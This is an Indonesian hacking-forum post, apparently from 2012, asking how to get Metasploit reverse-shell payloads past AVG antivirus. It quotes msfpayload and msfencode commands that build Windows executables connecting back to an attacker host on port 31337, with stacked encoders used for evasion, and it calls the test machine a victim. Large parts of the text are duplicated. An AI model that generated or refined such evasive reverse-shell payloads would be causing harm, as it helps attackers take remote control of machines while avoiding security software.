01-08-2012, 10:07 PM
bukan nya g taw ada thread tentang bypass av avira,,tapi ni om berbeda tipe payloads dengan om red-dragon yang memakai meterpreter dan vanish.sh,
menurut sumber payload nya memakai windows/shell_reverse_tcp dan windows/shell/reverse_tcp yang dibuat .exe
tapi ane mau tanya nih om,,karena hasil yang ane kerjakan menurut sumber sebanyak 4 kali, tetep payloads 7.exe kebabat sama avg is 2011 ane,,
for sumber disini nih,,
masalah ane dimari bro
ok giliran ane ngetes pake AVG Internet Security 2011 Full Version
ane coba langsung bikin 3 payloads nih dan langsung memindahkannya ke komputer korban yang ber av kan AVG IS 2011 pro,,
curhat bro,,sebenar nya ini yang ke4 kalinya ane coba,,penasaran,,percobaan pertama ane payloads 6.exe dan 7.exe habis dibabat avg ane,,tapi payloads 2.exe kagak kena,,
seharusnya berdasarkan yang ane baca disumber payloads 2 dan 6 yang dibabat dan payloads 7 selamat,, tapi untung ane ada backup file 2 yang selamat,
jadi menurut mastah2 gimana??bantuin donk,,ane udah ulang buat payloads 2,6,dan 7 terus kebabat semua sama avg is 2011
for ss ane
[spoiler]
ss avg ane
ss hasil scan yang ke 4 kali coba
ss backup payloads 2.exe yang selamat gak kebabat(percobaan pertama)
mhaapt kalo maksa buka thread baru tentang bypass antivirus,,tapi karena ane pikir berbeda type payloads makanya ane buka,,
kalo salah hapus aja om momod atau om mimin
menurut sumber payload nya memakai windows/shell_reverse_tcp dan windows/shell/reverse_tcp yang dibuat .exe
tapi ane mau tanya nih om,,karena hasil yang ane kerjakan menurut sumber sebanyak 4 kali, tetep payloads 7.exe kebabat sama avg is 2011 ane,,
for sumber disini nih,,
masalah ane dimari bro
ok giliran ane ngetes pake AVG Internet Security 2011 Full Version
ane coba langsung bikin 3 payloads nih dan langsung memindahkannya ke komputer korban yang ber av kan AVG IS 2011 pro,,
Quote:root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
root@bt:/pentest/exploits/framework# file /tmp/2.exe
/tmp/2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/pentest/exploits/framework# msfpayload windows/shell_reverse_tcp LHOST=192.168.43.187 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /tmp/6.exe
root@bt:/pentest/exploits/framework# msfpayload windows/shell/reverse_tcp LHOST=192.168.43.187 LPORT=31337 X > /tmp/7.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.43.187", "LPORT"=>"31337"}
lanjut copykan, hehehe
ini dia hasil jalankan backup payloads 2 yang gak kebabat sama avg ane(payloads 2 yang pertama buat)
Spoiler! :
curhat bro,,sebenar nya ini yang ke4 kalinya ane coba,,penasaran,,percobaan pertama ane payloads 6.exe dan 7.exe habis dibabat avg ane,,tapi payloads 2.exe kagak kena,,
seharusnya berdasarkan yang ane baca disumber payloads 2 dan 6 yang dibabat dan payloads 7 selamat,, tapi untung ane ada backup file 2 yang selamat,
jadi menurut mastah2 gimana??bantuin donk,,ane udah ulang buat payloads 2,6,dan 7 terus kebabat semua sama avg is 2011
for ss ane
[spoiler]
ss avg ane
ss hasil scan yang ke 4 kali coba
ss backup payloads 2.exe yang selamat gak kebabat(percobaan pertama)
mhaapt kalo maksa buka thread baru tentang bypass antivirus,,tapi karena ane pikir berbeda type payloads makanya ane buka,,
kalo salah hapus aja om momod atau om mimin